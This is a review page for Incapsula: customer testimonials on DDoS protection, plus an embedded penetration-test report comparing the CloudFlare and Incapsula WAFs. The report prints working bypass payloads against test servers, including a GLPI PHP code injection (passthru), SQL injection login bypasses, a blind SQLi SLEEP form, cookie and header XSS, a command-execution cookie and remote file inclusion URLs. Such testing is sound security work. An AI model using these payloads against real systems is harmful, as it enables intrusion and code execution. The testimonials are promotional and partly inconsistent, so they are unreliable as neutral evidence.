Imperva Application Security Platform Reviews

To support the growing traffic to our website from online traders, we realized that strong protection from DDoS and other types of attacks was only part of the equation. To ensure high availability (99.999% uptime) and consistent performance for our users, we also needed the ability to efficiently distribute website traffic across multiple servers.

As our online business grew, it became clear to us that we needed an enterprise-grade service that was able to combine powerful DDoS mitigation together with advanced load-balancing capabilities that would enable us to cost-effectively scale beyond the capacity of a single web server, as well as supporting automatic failover to prevent downtime.

Our previous cloud-based DDoS mitigation service supported load balancing via DNS, which by definition is TTL-reliant. This means that in the event of an overloaded server, for example, it may take several minutes before traffic is re-routed to another server. In the meantime, users continue to be routed to the overloaded server, further adding to the load and increasing latency. Another disadvantage of this load balancing method is that TTL may vary for different geographies and ISPs.

In the extremely time-sensitive world of online trading, it is mandatory that all traders have access to the same information at the same time. DNS-based load balancing was not suitable for our business model and impaired the user experience.

With these requirements in mind, we started our search for an alternative solution and came across some reviews of Incapsula in online industry forums.

Following an evaluation of Incapsula against our previous solution, we decided to purchase Incapsula’s comprehensive Enterprise plan, including “always on” DDoS Protection, an enterprise-grade WAF, Load Balancing and a global CDN. Incapsula was initially onboarded for a single server. We added a second server one week later for purposes of Load Balancing and Failover.

The key factors in our choice of Incapsula was that we were particularly impressed with its enterprise-grade WAF, powerful non-intrusive DDoS protection and efficient load balancing capabilities. From a management point of view, Incapsula’s real-time statistics, easy setup procedures and detailed control panel also represented a significant improvement from our previous solution.

We use Incapsula's service to secure our online trading platform against any type of DDoS attack (Layers 3, 4 & 7) with virtually zero business disruption. All incoming traffic to our online trading application is filtered by Incapsula, which automatically detects and blocks DDOS attacks and other types of malicious traffic. In addition, Incapsula’s sophisticated and scalable load balancing solution supports several different traffic distribution methods with built-in monitoring and failover capabilities to ensure high availability.

By using Incapsula's service, we have achieved several concrete benefits:

• Layer 7 load balancing – Tracks HTTP requests as they are being processed by the origin servers, intelligently distributes the traffic in accordance with actual server loads, and reacts quickly to lags even before the server becomes unresponsive
• Cloud-based mitigation of network DDoS attacks - Mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
• Intelligent mitigation of sophisticated application layer attacks - Uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
• Real-time statistics - Provides a complete, real time view of incoming traffic, security events and server load distribution, allowing rapid response to security events and supporting real-time data driven decisions.

Incapsula has proven to be a very effective solution for meeting our rigorous security and load balancing requirements. Real-time statistics rock – it’s like having your own NOC at the click of a button, and helps us to better manage our website with 360-degree visibility of all events.

To ensure the success of our online trading operations, we place a major emphasis on state-of-the-art security, high availability (99.9% uptime) and user convenience.

Daily high-volume network DDoS attacks against our website were wreaking havoc with business operations, resulting in downtime for our online trading platform. The anti-DDoS solutions we had in place was not equipped to mitigate these attacks, which came precisely at the time when we were experiencing record trading volumes.

Since our company deals with a highly competitive and time-sensitive trading market, high availability and stability are paramount to building our users' confidence in our platform. It was obvious to us that in order to maintain and grow our business, we needed the best DDoS protection solution.

We required a high-capacity solution capable of mitigating the largest Layer 3 DDoS attacks, which can often reach several tens of Gbps. Blackholing was not a desirable option, since this aggressive method for diverting traffic actually serves the attackers' goal of denying and disrupting service by not allowing any visitors to reach the site.

To ensure an optimal user experience, we sought a DDoS mitigation solution that would be transparent to users. In this context, we preferred a solution that does not use delay pages, which cause problems for the application's APIs and prevent users from connecting to the server.

In terms of architecture, we preferred a cloud-based solution for reasons of cost-effectiveness and compatibility with our existing cloud computing infrastructure.

Aware of the threat to our core business, we immediately began to look for a new anti-DDoS solution with the network capacity and security proficiency to meet our requirements. After an in-depth evaluation of leading DDoS Protection services in several industry comparisons and reviews, we chose Incapsula's cloud-based DDoS Protection service based on its ability to mitigate any type of DDoS attack with virtually zero business disruption.

We conducted an initial trial with Incapsula while still experiencing DDoS attacks of up to 100 Gbps. Incapsula mitigated these attacks, keeping the online trading platforms up at all times.

Our experience so far shows that Incapsula is a marked improvement over other DDoS protection companies we have worked with in the past. Despite the fact that attacks on our high-profile website are still a daily occurrence, traders coming to the site are able to buy and sell without any noticeable degradation in terms of performance and availability.

Through its non-intrusive traffic filtering and an enterprise-grade Web Application Firewall, Incapsula has been stable in protecting our online applications. The service secures websites and applications against all types of DDoS attacks, as well as sophisticated application attacks such as XSS and SQL injections.

Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.

By using Incapsula's DDoS Protection, we have achieved concrete benefits:

• Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
• Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
• "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks can wreak havoc with solutions that need to be manually turned on and off on every burst.
• Dedicated SoC team – An experienced team of Security Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.

Incapsula helped us stay up during some of the biggest DDoS attacks on record. This happened at a critical business juncture, when our increasing trading volumes were turning us into the number one bitcoin trading site in the world. We hope to continue working with Incapsula as we gain more exposure and popularity.

Valuable Features:

Improvements to My Organization:

CloudFlare vs Incapsula: Round 2
Web Application Firewall

Comparative Penetration Testing Analysis Report v1.0

Summary

This document contains the results of a second comparative penetration test conducted by a team of security specialists at Zero Science Lab against two cloud-based Web Application Firewall (WAF) solutions: Incapsula and Cloudflare. This test was designed to bypass security controls in place, in any possible way, circumventing whatever filters they have. Given the rise in application-level attacks, the goal of the test was to provide IT managers of online businesses with a comparison of these WAFs against real-world threats in simulated real-world conditions.

Zero Science Lab is a Macedonian Information Security Research and Development Laboratory that specializes in information security hardening, consulting, network security, vulnerability research, software and hardware security assessment, penetration testing, malware analysis, forensics and much more - https://www.zeroscience.mk

Background
In February 2013, we conducted the first comparative pentest analysis of the CloudFlare, Incapsula and ModSecurity Web Application Firewall (WAF) solutions. The goal of a WAF is to block hacker attacks / unwanted malicious traffic to your web application with as few false positives as possible.

Since then, all three vendors had replied to the findings, applying patches to the discovered bypasses and improving their products to protect their customers from web attacks. In August 2013, CloudFlare even launched a new rule- based WAF to augment their existing heuristics-based WAF (which we used in the first pentest). Since Incapsula also uses a rule-based approach, we decided that now is a good time to run a follow-up pentest comparison, this time focusing only on CloudFlare's new WAF and Incapsula's WAF. Over the past 8 months, both vendors have improved their firewall solution by adding extra features, upgrading the rulesets and signature detection algorithms.

The difference between this report and the previous one is that now we have focused more on real-world web application exploitation applying known encoding techniques, as well as the rate of false positives.

Results

1. Attack Vector coverage
The table below shows the overall statistics of the exploits testing:

2. WAF evasion techniques
Blackbox penetration test was conducted against the two services (using their respective Business Plans), applying known filter evasion techniques to bypass their web application firewall solution using real-world scenarios and variety of attack vectors.

We wanted to check how the WAFs deal with evasion techniques, and we took common vectors for each rule and obfuscated them using different evasion techniques like:

• Multi-parameter vectors
• Microsoft Unicode encoding
• Invalid characters
• SQL comments
• Redundant white space
• HTML encoding for XSS
• Javascript escaping for XSS
• Hex encoding for XSS
• Character encoding for Directory Traversal

3. Known Vulnerabilities Handling
Each of the exploits was executed with their default given payload. After that, we applied the evasion techniques on the same payloads and mark the results. Below is a table that gives you an overview of which vulnerability was blocked and which vulnerability has bypassed the WAF mechanisms for detecting known web application exploits.

Results (overview of real apps exploit bypass list):

4. FalsePositives
Obviously a key evaluation criteria for a WAF is to be able to block as many attack variants as possible. However, in real life scenarios there is another evaluation criteria that is as important – not blocking legitimate users.

Testing for false positives is not a trivial task and the way we have decided to run this test is to simulate an administrator that is updating the application HTML. You would find this action in any CMS and it is specifically prone to false positives in XSS filters that look for suspicious HTML and Javascript code.

From our tests it seems that Incapsula has a mechanism to detect what CMS is installed on the web server and to automatically detect and whitelist legitimate administrative actions.

On the other hand CloudFlare’s aggressive XSS filter blocked legitimate attempts to upload HTML and Javascript code to the application through the CMS built in functions.

Conclusion
From the results table, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.

While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.

We noticed the high block ratio of XSS attacks, but from all the types of attacks, main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had very low detection rate by the CloudFlare WAF.

Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.

Intro
Both Incapsula and CloudFlare WAF services have improved their protection mechanisms and detection methodologies since the previous evaluation. That being said, we decided to put them on yet another heavy test and see what filters we can evade/bypass. All the settings were set to maximum level of protection in both testing environments.

This time we used several real-world applications vulnerable to different types of attack vectors to simulate a real hacking scenario against the firewall services of both vendors.

Along with the vulnerable applications, we used an improved PoC script file to test the solutions against generic attack vectors and their learning mechanisms. This script was written by us and it basically allows calling unsanitized input from the users which allowed us to exploit it and manipulate the results in several ways which would confirm 100% whether or not the filter was indeed working as expected.

Setup and configuration
We're not going in details on how to setup CloudFlare and Incapsula services. Refer to the previous report for more details. All we can say here is that the infrastructure design has remained the same which is the WAF sitting in front of the dedicated server, intercepting all requests that are destined for it. The setup process from client's perspective has stayed the same as well. We've set everything to 'ON' and 'HIGH' for both WAF options.

CloudFlare WAF Settings

Incapsula WAF Settings

Targets and tools
For this occasion we've created two separate testbeds on separate server host machines.

- CloudFlare - cf.destr0y.net

- Incapsula - in.zeroscience.mk, inc.zeroscience.mk, inc.destr0y.net, 4sylum.elgringodelanoche.com

The testbed servers were running Apache web server with PHP and MySQL DBMS. Both the servers had the 'poc.php' script deployed, which is vulnerable to Cross-Site Scripting, SQL Injection, Local and Remote File Inclusion, Cookie Poisoning and Command Execution attacks. We also installed several real-world web applications that are vulnerable to different attack vectors.

Practico CMS 13.7 Auth Bypass SQL Injection - by shiZheni (https://www.exploit-db.com/exploits/28129)
Practico CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'uid' parameter. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

WP NOSpamPTI Plugin Blind SQL Injection - by Alexandro Silva (https://www.exploit-db.com/exploits/28485)
NOSpamPTI contains a flaw that may allow an attacker to carry out a Blind SQL injection attack. The issue is due to the wp- comments-post.php script not properly sanitizing the comment_post_ID in POST data. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

WP TimThumb Plugin Remote Code Execution - by Mark Maunder (https://www.exploit-db.com/exploits/17602)
TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory.

WP W3 Total Cache Plugin PHP Code Execution - by Unknown (https://osvdb.org/show/osvdb/92652) W3 Total Cache Plugin for WordPress contains a flaw that is due to the program failing to properly restrict access to the mclude
and mfunc PHP code inclusion macros. This may allow a remote attacker to insert and execute arbitrary PHP code.

webgrind 1.0 Local File Inclusion Vulnerability - by Michael Meyer (https://www.exploit-db.com/exploits/18523)
webgrind suffers from a file inclusion vulnerability (LFI) when input passed thru the 'file' parameter to index.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

Newsletter Tailor 0.2.0 Remote File Inclusion - by Snakespc (https://www.exploit-db.com/exploits/11378)
Newsletter Tailor contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the index.php script not properly sanitizing user input supplied to the 'p' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

Apache Struts <2.2.0 Command Execution - by Meder Kydyraliev (https://www.exploit-db.com/exploits/14360)
Apache Struts versions < 2.2.0 suffers from a remote command execution vulnerability. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the "#" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.

Apache Struts includeParams RCE < 2.3.14.2 - by Eric K., Douglas R. (https://www.osvdb.org/show/osvdb/93645)
Apache Struts contains a flaw that may allow an attacker to execute arbitrary commands. The issue is due to the handling of the includeParams attribute in the URL and Anchor tags. With a specially crafted request parameter, an attacker could inject arbitrary OGNL code that would be evaluated. In addition, a second evaluation of attacker supplied input can occur when the URL or Anchor tag tries to resolve arbitrary parameters, that would be evaluated as an OGNL expression.

Apache Struts < 2.2.3 Multiple RCE - by Takeshi Terada (https://www.securityfocus.com/bid/61189) Apache Struts is prone to multiple remote command-execution vulnerabilities. Successful exploits will allow remote attackers to
execute arbitrary commands within the context of the affected application.

GLPI < 0.84.1 Arbitrary PHP Code Injection - by High-Tech Bridge SA (https://www.exploit-db.com/exploits/28685)
GLPI suffers from an insufficient validation of user-supplied input passed to the "db_host", "db_user", "db_pass", and "databasename" HTTP POST parameters via "/install/install.php" script [that is present by default after application installation] before writing data into "/config_db.php" file. A remote attacker can inject and execute arbitrary PHP code on the vulnerable system.

Joomla CMS 3.1.5, WordPress 3.6.1 and phpMyAdmin 4.0.8 - False Positives Front

99% of the test was manually approached, but we used several tools for fuzzing and automation to see how the WAFs will behave on scanners and session tracking.

Tools used:

• Acunetix Web Vulnerability Scanner
• Havij SQL Injection Tool
• Burp Suite
• OWASP Zed Attack Proxy (ZAP)
• TamperData
• Firebug
• Cookies Manager+
• CookieMonster
• HttpFox
• Live HTTP Headers
• tcpdump
• Wireshark
• Metasploit Framework

We used the following browsers:

• Mozilla Firefox
• Microsoft Internet Explorer
• Google Chrome
• Opera
• Apple Safari
• Iceweasel

Contents of poc.php:

(click to enlarge)

Testing and analysis
From previous report, Incapsula patched the bypasses and has improved their WAF and even included a new separate control for RFI attacks.

CloudFlare having in mind our previous results has introduced a much improved WAF based on OWASP Core Rule Set (ModSecurity). However, there are lots of bypasses present in the newly upgraded WAF solution. We noticed only a few false positives in CloudFlare while doing regular tasks, using a legitimate application from regular user's perspective. Given the fact that the False Positives test was executed using phpMyAdmin, this was more than expected.

Incapsula on the other hand had also a few false positives, including simple Joomla administrator actions. Unlike Cloudflare, Incapsula offers a great option for whitelisting the request URL and the affected parameter, which allows the WAF administrator to resolve incidents of this kind at any time.

What’s also important to note is that Incapsula can recognize an ongoing attack and block attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such mechanism on CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers.

XSS vectors:

Results (CloudFlare):

Webgrind Local File Inclusion Bypass:
https://cf.destr0y.net/webgrind/index.php?file=/etc...

GLPI SQL Injection and Remote Code Execution Bypass:

<form action="https://cf.destr0y.net/glpi/install/install.php" method="post" name="main"> <input type="hidden" name="install" value="update_1"> <input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*"> <input type="submit" id="btn"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-008.png" width="650"> </p>

https://cf.destr0y.net/glpi/index.php?cmd=ls%20-la;...

Newsletter Tailor Remote File Inclusion Bypass:
https://cf.destr0y.net/list/admin/index.php?p=http:...

https://cf.destr0y.net/list/admin/index.php?p=http:...

Practico SQL Injection Authentication Bypass:

POST /practico/ HTTP/1.1 Host: cf.destr0y.net Content-Type: application/x-www-form-urlencoded Content-Length: 73 Connection: keep-alive Accept-Encoding: gzip, deflate accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=vhw3 <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-012.jpg" width="650"> </p>

TimThumb Remote File Include Bypass:
https://cf.destr0y.net/wp/wp- content/plugins/timthumb/cache/external_3ad96be987d746db968ebaa77c49900e.php

WP Plugin NoSpamPTI Blind SQL Injection Bypass:

<form novalidate="" id="commentform" method="post" action="https://cf.destr0y.net/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"><br> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form> <p> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-014.jpg" width="650"> <img src="https://s3-us-west-2.amazonaws.com/itcs-data/posting_images/images/original/29496/wafreport2013v2-015.png" width="650"> </p>

Cookie Poisoning Bypass (XSS, SQLi, RFI, LFI, CMDexec):

CloudFlare doesn't check the Cookie value or any other HTTP header field (except User-Agent) for malicious strings. To prove this, we successfully managed to exploit the cookie vulnerabilities in the PoC script.

Cookie XSS Bypass:

Cookie value: hallo=J0xy0L </h2><script>alert(document.cookie)</script>

Cookie CMDExec Bypass:

Cookie value: market=uname -a;

Cookie LFI/RFI Bypass:
Cookie value: segment=https://zeroscience.mk/pentest/tim.php

Cookie SQLi Bypass:
Cookie value: notifications=dasdsa' union select* from testwaf;#

Directory Traversal Bypass using Burp:

Apache Struts Block (msf):

SQL Injection Fuzz (ZAP) Block:

WP W3 Total Cache Plugin PHP Code Execution Block:

<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

User-Agent HTTP Header Field XSS Block:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(1);</script>

False Positive (phpMyAdmin):
https://cf.destr0y.net/phpma/querywindow.php?token=... &table=testwaf&sql_query=SELECT%20*%20FROM%20%60testwaf%60%20WHERE%20%60testzsl%60%3D1&init=1 (?)

Unlike Incapsula, CloudFlare does not offer an option to whitelist the requests and parameters but rather whitelist the IP of the user.

Results (Incapsula):

Webgrind Local File Inclusion Bypass:

Seems its configured to detect and trigger on hardcoded values (I.E: /etc/hosts, /etc/passwd). The vulnerability can still be used to read other valuable files on the system. For example:
https://in.zeroscience.mk/webgrind/index.php?op=fil...

GLPI SQL Injection and Remote Code Execution Bypass:

<form action="https://inc.destr0y.net/glpi/install/install.php" method="post" name="main">

<input type="hidden" name="install" value="update_1">

<input type="hidden" name="db_host" value="'; } passthru($_GET['cmd']); /*">

<input type="submit" id="btn">

</form>

GLPI SQL Injection and Remote Code Execution Bypass:

POST /practico/ HTTP/1.1

Host: 4sylum.elgringodelanoche.com

Content-Type: application/x-www-form-urlencoded

accion=Iniciar_login&uid=admin' AND 230984752 = 230984752#&clave=admin&captcha=rxbg

Accept-Encoding HTTP Header Field XSS Bypass:
AE value: gzip, deflate"><script>alert(1);</script>

User-Agent HTTP Header Field XSS Bypass:
UA value: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"><script>alert(document.cookie)</script>

Remote File Include Bypass (questionable (captcha)):

Apache Struts Block (tcpdump):

Cross-Site Scripting Bypass:

Cross-Site Scripting Bypass:
https://inc.zeroscience.mk/poc.php?x=%3Cform%20id=t... %3Cbutton%20form=test%20onformchange=alert(/XSS/)%3EX%3C/button%3E

XSS Fuzz (Burp) Block:

WP Plugin NoSpamPTI Blind SQL Injection Block:

<form novalidate="" id="commentform" method="post" action="https://in.zeroscience.mk/wp/wp-comments-post.php"> <input type="submit" value="Post Comment" id="submit" name="submit"> <input type="hidden" id="comment_post_ID" value="1 AND SLEEP(15)" name="comment_post_ID"> <input type="hidden" value="0" id="comment_parent" name="comment_parent"> </form>

Newsletter Tailor Remote File Inclusion Block:
https://in.zeroscience.mk/list/admin/index.php?p=ht...

TimThumb Remote File Include Block:
https://in.zeroscience.mk/wp/wp- content/plugins/timthumb/timthumb.php?src=https://zeroscience.mk/pentest/tim.php.php

WP W3 Total Cache Plugin PHP Code Execution Block:

<textarea aria-required="true" rows="8" cols="45" name="comment" id="comment"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc--></textarea>

False Positive (Joomla):

Due to suspicious values being hardcoded as even triggers, Incapsula blocks legitimate access to applications with those keywords in the content/paylod.

For example, any comments in blogs or web content containing any of these keywords will cause Incapsula to deny access. As an example, any IT helpdesk blog with content containing strings such as /etc/passwd, /etc/hosts.

Access denied was presented to us when saving the global configuration in Joomla CMS because of the POST parameter 'jform[sendmail]' with value: /usr/sbin/sendmail...also when tried to install any extension we get blocked, but we can add the parameter and the request URL to the whitelist excluding this particular false positive.

POST https://in.zeroscience.mk/joomla/administrator/ind... HTTP/1.1 - jform[sendmail]=/usr/sbin/sendmail

POST https://in.zeroscience.mk/joomla/administrator/ind... - joomla extension install (RFI FP)

Afterthoughts

We can conclude and confirm that both solutions have improved over the course of this year. And that’s really good to see. Incapsula has invested more into blocking real life attacks on real apps. Their session blocks works pretty good against automated attacks but it didn’t block our sessions while doing the manual testing. They might want to put some more effort into that.

CloudFlare has made a big step forward by introducing a new WAF solution knowing that in the previous result they were rock bottom and basically didn’t stop any attacks. Their new solution is fine but they still have lots of work to do and put it on Incapsula level.

We also noticed that CloudFlare has a high protection rate for XSS attacks than SQLi and LFI/RFI combined.

As we’ve shown in the Results part, both Incapsula and CloudFlare, don’t block malicious request with values sent in HTTP Headers. This leaves an open door for attacker to exploit vulnerabilities of such kind. We specifically tested this with Cookie XSS, LFI, RFI, CMD Execution vulnerabilities in the PoC script. Here is a list of few public cookie poisoning vulnerabilities to show the real life relevance of this issue:

• ClanSphere 2011.3 Local File Inclusion - https://www.exploit-db.com/exploits/22181
• Aleza Portal v1.6 Insecure (SQLi) Cookie Handling - https://www.exploit-db.com/exploits/15144
• Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability - https://www.exploit-db.com/exploits/15144
• AV Arcade v3 Cookie SQL Injection Authentication Bypass - https://www.exploit-db.com/exploits/15144
• Website Baker Version <2.6.5 SQL Injection - https://www.exploit-db.com/exploits/15144
• SetSeed CMS 5.8.20 (loggedInUser) SQL Injection - https://www.exploit-db.com/exploits/15144

For References and Appendix see: https://zeroscience.mk/files/wafreport2013v2.pdf

We use Incapsula for some of our sites and the experience has been excellent. You would not even know it was there – unlike those caching plugins (admittedly they are for speed not for security) – which remind you constantly that they are there so much so that you have to turn them off. Whoops.

In September 2013, our online store was the victim of a prolonged three-week application-level DDoS attack. Mitigating this type of Layer 7 DDoS attack is a major challenge for security solutions, since malicious bot traffic often appears to be requests from legitimate users. During this attack, our existing anti-DDoS solution was not able to effectively filter out the malicious traffic, which meant that innocent e-commerce customers were blocked from accessing the sites or were forced to unnecessarily fill out CAPTCHA challenges.

As an e-commerce company, website security is central to our core business. We needed a DDoS protection solution that would enable us to maintain "business as usual" even under attack, with minimum disruption to the user experience. Minimizing false positives was a crucial requirement, since the easiest way to lose a customer is to block her from accessing the site.

Realizing that our previous solution was not equipped to handle this type of sophisticated application-level DDoS attack, we sought a DDoS Protection service capable of correctly filtering all types of DDoS attacks from legitimate website traffic, without affecting the online experience for our customers.

During our search for a new solution, we came across Incapsula and were impressed by industry comparisons such as the one appearing on TopTenReviews.com showing the clear superiority of Incapsula over our existing service in terms of professionalism, performance and security.

We decided to give Incapsula a try and initially activated their service on our French domain. It quickly became clear to us that Incapsula was the right solution to handle the DDoS attacks that we face. After only six days, we signed a contract and moved our other domains to Incapsula's service as well.

We are now using Incapsula's always-on DDoS Protection service to secure our online stores against the largest and smartest types of DDoS attacks - including network, protocol and application level (Layers 3, 4 & 7) attacks – with minimal business disruption.

Incapsula is now a key component of our security infrastructure. When under DDoS, traffic is routed through Incapsula for screening, where malicious traffic and DDOS attacks are blocked automatically.

By using Incapsula's DDoS Protection, we have achieved concrete benefits:

• Intelligent mitigation of sophisticated application layer attacks - Incapsula uses advanced traffic analysis algorithms, granular mitigation rules and an enterprise-grade WAF to differentiate legitimate website visitors (humans, search engines, etc.) from automated or malicious clients.
• Transparent mitigation with less than 0.1% False Positives - Incapsula applies a set of progressive and non-intrusive challenges that are designed to ensure the optimal balance between strong DDoS protection and an uninterrupted user experience, without the need for annoying delay and CAPTCHA screens.
• "Always on" DDoS protection - Automatic "always on" DDoS mitigation and 24x7 monitoring are effective in stopping "hit & run" DDoS attacks can wreak havoc with solutions that need to be manually turned on and off on every burst.
• Cloud-based mitigation of network DDoS attacks - Incapsula mitigates high-volume network attacks through a global network of multi-gigabyte scrubbing centers
• Dedicated NOC team – An experienced team of Network Operations Center (SOC) engineers performs 24x7 security monitoring and assists with DDoS mitigation as needed.

Since activating Incapsula on our sites, we have solved our DDoS problem and couldn't be more pleased with our overall website performance and security. Equally important, Incapsula's technical support and commercial teams have been very responsive throughout the initial rollout phase.

Our company has recently reached 3.5 million registered users and 200,000 hosted websites. Daily DDoS attacks on our platform resulted in unnecessary and prolonged downtime for the thousands of sites on our network. These attacks included network level (layer 3 & 4) attacks ranging from 2Gbps to 10Gbps with various attack vectors such as UDP attacks but most commonly SYN floods which exploit the TCP three-way handshake to consume the server’s connection resources. The more challenging attacks were the diverse application level (Layer 7) attacks. These attacks seem as if they are originating from legitimate sources, try to mimic human behavior and consume the backend computing resources of the website.

We were seeing daily DDOS attacks, sometimes multiple DDOS attacks in parallel on various client websites. Since our company is a global hosted community platform and social network, everyone was affected at the same time. We needed to make sure that no attack on any one website could bring other websites down. We have gone through paid evaluations of several DDoS Mitigation services, but all of them failed to block DDOS attacks automatically without serious side effects, as blocking legitimate visitors

Once we decided to evaluate Incapsula's Cloud-Based DoS protection, Incapsula's team quickly helped us to setup a few of our websites on the service.

Once we joined Incapsula, they immediately identified that our network was under various types of attacks at almost any given time, both network and application level attacks.

While the network based attacks were absorbed by Incapsula’s backbone, the application layer attacks were very diverse. Incapsula relied very heavily on their bot detection and progressive DDoS challenge technology, to block 100% of attackers transparently, without incurring any noticeable effect to almost all of the real users.

Maintaining the best possible customer experience was a key consideration for us. It was very apparent why other DDoS protection services that involve delays, CAPCHAs and other side effect on visitors' would not work for us. Also, a DDoS solution that isn't fully automated, would keep our team constantly busy to enable/disable the protection service.

Incapsula’s ability to allow human and legitimate bot traffic to access the website with no interruption, while filtering network and application level DDoS traffic, allowed us to put our DDoS problems behind and focus on what we do best, which is building a great platform for the online gamers community.

Incapsula is now a critical component of our security infrastructure. All traffic to our network and hosted websites passes through Incapsula for screening. Malicious traffic and DDOS attacks are blocked automatically.

We take advantage of Incapsula's DDoS Protection key benefits, to secure our online properties:

• Protection against Network and Application Level Attacks- Through a worldwide network of multi-gigabit scrubbing centers and unique bot (automation) detection technology, Incapsula provides complete protection for both network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.
• 24x7 Managed Security Service- Incapsula’s DDoS security team monitors attacks and is available on-demand before, during or after attacks to ensure that our sites are up and running and performing.
• vZero Business Disruption- Incapsula’s CDN and bot detection technology ensure that even under attack, our website traffic is accelerated and legitimate visitors are not delayed or denied access to our sites.

Our network was finally clear from the endless onslaught of crippling UDP & SYN flood attacks that we had been experiencing. Using Incapsula's dashboard, we were able to see exactly when each attack was happening, and continue delivering service to millions of users during the attack. We also saw a sharp drop in unwanted bot activity, which resulted in a 20% drop in load on our servers. A key feature we were looking for is a very low false positive rate during mitigation. Incapsula proved to have a near zero false positive rate, and legitimate users had no trouble accessing our websites during prolonged DDOS attacks.

What is our primary use case?

What is most valuable?

What needs improvement?

For how long have I used the solution?

What do I think about the stability of the solution?

What do I think about the scalability of the solution?

How was the initial setup?

What's my experience with pricing, setup cost, and licensing?

What other advice do I have?

Which deployment model are you using for this solution?